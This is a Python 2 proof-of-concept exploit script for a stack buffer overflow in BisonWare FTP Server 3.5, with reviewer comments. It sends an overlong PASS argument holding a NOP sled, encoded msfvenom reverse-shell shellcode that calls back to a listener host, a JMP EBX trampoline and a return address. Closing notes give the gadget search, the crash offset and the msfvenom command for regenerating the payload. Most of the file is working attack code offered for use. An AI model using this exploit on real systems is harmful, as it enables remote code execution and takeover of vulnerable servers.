Exploit for BisonWare FTP Server 3.5 — stack buffer overflow triggered by an overlong PASS argument, delivering an msfvenom reverse-shell payload (details in the comments at the end of the script).
#!/usr/bin/python
# Proof-of-concept for a stack buffer overflow in BisonWare FTP Server 3.5:
# an overlong argument to the FTP PASS command overwrites the saved return
# address (EIP is hit at offset 1155 of the argument; see the helper notes at
# the bottom). The payload is a Metasploit windows/shell_reverse_tcp stager,
# so a vulnerable host will connect back to the LHOST baked into the shellcode.
# Use only against systems you are authorised to test.
#
# NOTE(review): written for Python 2 -- str literals are sent as raw bytes.
# Under Python 3 every literal below would have to be a bytes literal (b"..."):
# send() rejects str, and encoding "\x8f\xe8\xb1\x7c" as UTF-8 would produce
# different bytes than the intended 0x8f 0xe8 0xb1 0x7c.
import socket,time
#jump memory code
# Trampoline stub placed just before the return address:
#   "\x83\xEB\x32" = sub ebx, 0x32 ; repeated 8 times -> ebx -= 0x190 (400)
#   "\xff\xe3"     = jmp ebx
# The overwritten return address is a JMP EBX gadget (see below), so this
# relies on EBX pointing at this stub when the function returns; subtracting
# 400 then moves execution back into the NOP sled in front of the shellcode.
# Confirm the EBX assumption in a debugger before relying on it.
jmp = "\x83\xEB\x32"*8
jmp += "\xff\xe3"
#exploit code
# msfvenom-generated windows/shell_reverse_tcp (27 lines x 13 = 351 bytes),
# encoded to avoid the bad characters listed in the msfvenom command at the
# bottom. LHOST/LPORT (192.168.25.6:443) are encoded inside these bytes -- they
# cannot be changed by editing this script; regenerate the payload instead.
buf = ""
buf += "\xbe\xa8\x9a\x2c\x48\xda\xce\xd9\x74\x24\xf4\x5d\x31"
buf += "\xc9\xb1\x52\x83\xed\xfc\x31\x75\x0e\x03\xdd\x94\xce"
buf += "\xbd\xe1\x41\x8c\x3e\x19\x92\xf1\xb7\xfc\xa3\x31\xa3"
buf += "\x75\x93\x81\xa7\xdb\x18\x69\xe5\xcf\xab\x1f\x22\xe0"
buf += "\x1c\x95\x14\xcf\x9d\x86\x65\x4e\x1e\xd5\xb9\xb0\x1f"
buf += "\x16\xcc\xb1\x58\x4b\x3d\xe3\x31\x07\x90\x13\x35\x5d"
buf += "\x29\x98\x05\x73\x29\x7d\xdd\x72\x18\xd0\x55\x2d\xba"
buf += "\xd3\xba\x45\xf3\xcb\xdf\x60\x4d\x60\x2b\x1e\x4c\xa0"
buf += "\x65\xdf\xe3\x8d\x49\x12\xfd\xca\x6e\xcd\x88\x22\x8d"
buf += "\x70\x8b\xf1\xef\xae\x1e\xe1\x48\x24\xb8\xcd\x69\xe9"
buf += "\x5f\x86\x66\x46\x2b\xc0\x6a\x59\xf8\x7b\x96\xd2\xff"
buf += "\xab\x1e\xa0\xdb\x6f\x7a\x72\x45\x36\x26\xd5\x7a\x28"
buf += "\x89\x8a\xde\x23\x24\xde\x52\x6e\x21\x13\x5f\x90\xb1"
buf += "\x3b\xe8\xe3\x83\xe4\x42\x6b\xa8\x6d\x4d\x6c\xcf\x47"
buf += "\x29\xe2\x2e\x68\x4a\x2b\xf5\x3c\x1a\x43\xdc\x3c\xf1"
buf += "\x93\xe1\xe8\x56\xc3\x4d\x43\x17\xb3\x2d\x33\xff\xd9"
buf += "\xa1\x6c\x1f\xe2\x6b\x05\x8a\x19\xfc\xea\xe3\x38\xfa"
buf += "\x82\xf1\x3a\x03\xe8\x7f\xdc\x69\x1e\xd6\x77\x06\x87"
buf += "\x73\x03\xb7\x48\xae\x6e\xf7\xc3\x5d\x8f\xb6\x23\x2b"
buf += "\x83\x2f\xc4\x66\xf9\xe6\xdb\x5c\x95\x65\x49\x3b\x65"
buf += "\xe3\x72\x94\x32\xa4\x45\xed\xd6\x58\xff\x47\xc4\xa0"
buf += "\x99\xa0\x4c\x7f\x5a\x2e\x4d\xf2\xe6\x14\x5d\xca\xe7"
buf += "\x10\x09\x82\xb1\xce\xe7\x64\x68\xa1\x51\x3f\xc7\x6b"
buf += "\x35\xc6\x2b\xac\x43\xc7\x61\x5a\xab\x76\xdc\x1b\xd4"
buf += "\xb7\x88\xab\xad\xa5\x28\x53\x64\x6e\x48\xb6\xac\x9b"
buf += "\xe1\x6f\x25\x26\x6c\x90\x90\x65\x89\x13\x10\x16\x6e"
buf += "\x0b\x51\x13\x2a\x8b\x8a\x69\x23\x7e\xac\xde\x44\xab"
# Layout of the PASS argument (1159 bytes in total):
#   [NOP sled: 1115 - 351 = 764 bytes][shellcode: 351 bytes]   -> 1115 bytes
#   ["B" filler: 40 - 26 = 14 bytes][jmp stub: 26 bytes]       -> offset 1155
#   [return address: 0x7CB1E88F little-endian, a JMP EBX gadget] -> 4 bytes
buffer ="\x90"*(1115 - len(buf)) + buf + "B"* (40 - len(jmp)) + jmp+"\x8f\xe8\xb1\x7c"
soc = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
# 192.168.25.27 -> VM server ftp ip
# NOTE(review): the target is hard-coded, no timeout is set on the socket (an
# unresponsive host blocks forever), and the socket is never closed.
soc.connect(("192.168.25.27",21))
time.sleep(1)
r = soc.recv(2048)                # FTP banner
soc.send("USER anonymous\r\n")
r = soc.recv(1024)                # password prompt
soc.send("PASS "+buffer+"\r\n")   # the overflow happens while the server parses this line
# NOTE(review): if the overflow succeeds the server either crashes or runs the
# payload and may never answer, so expect this recv() to return "" or raise.
r = soc.recv(1024)
# helper:
# Find a JMP EBX gadget (opcode FF E3). Note the opcode: FF E4 would be
# JMP ESP, which is not what the trampoline stub above relies on.
# !mona find -s "\xff\xe3" -m bisonftp.exe
# 0040307D . FFE3 JMP EBX   -- inside bisonftp.exe, but the address contains
#                              0x00 and 0x40, both in the bad-character list
#                              below, so it cannot be used
# 7CB1E88F FFE3 JMP EBX -- system32  (the address used in `buffer`; it lives in
#                          a system DLL, so it only holds on the OS/build the
#                          author tested and assumes the DLL loads at a fixed
#                          address -- re-find it for any other target)
# crash 1200                -- a 1200-byte PASS argument crashed the server
# pattern_offset = 42356D42 -> 1155 pos   (EIP overwritten at offset 1155)
# this exploit connect in reverse shell
# change the IP ;)  -- i.e. regenerate the shellcode with your own LHOST/LPORT
#                      using the command below; editing the script is not enough
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.25.6 LPORT=443 -b "\x00\x0a\x0d\x20\x40" EXITFUNC=thread -f python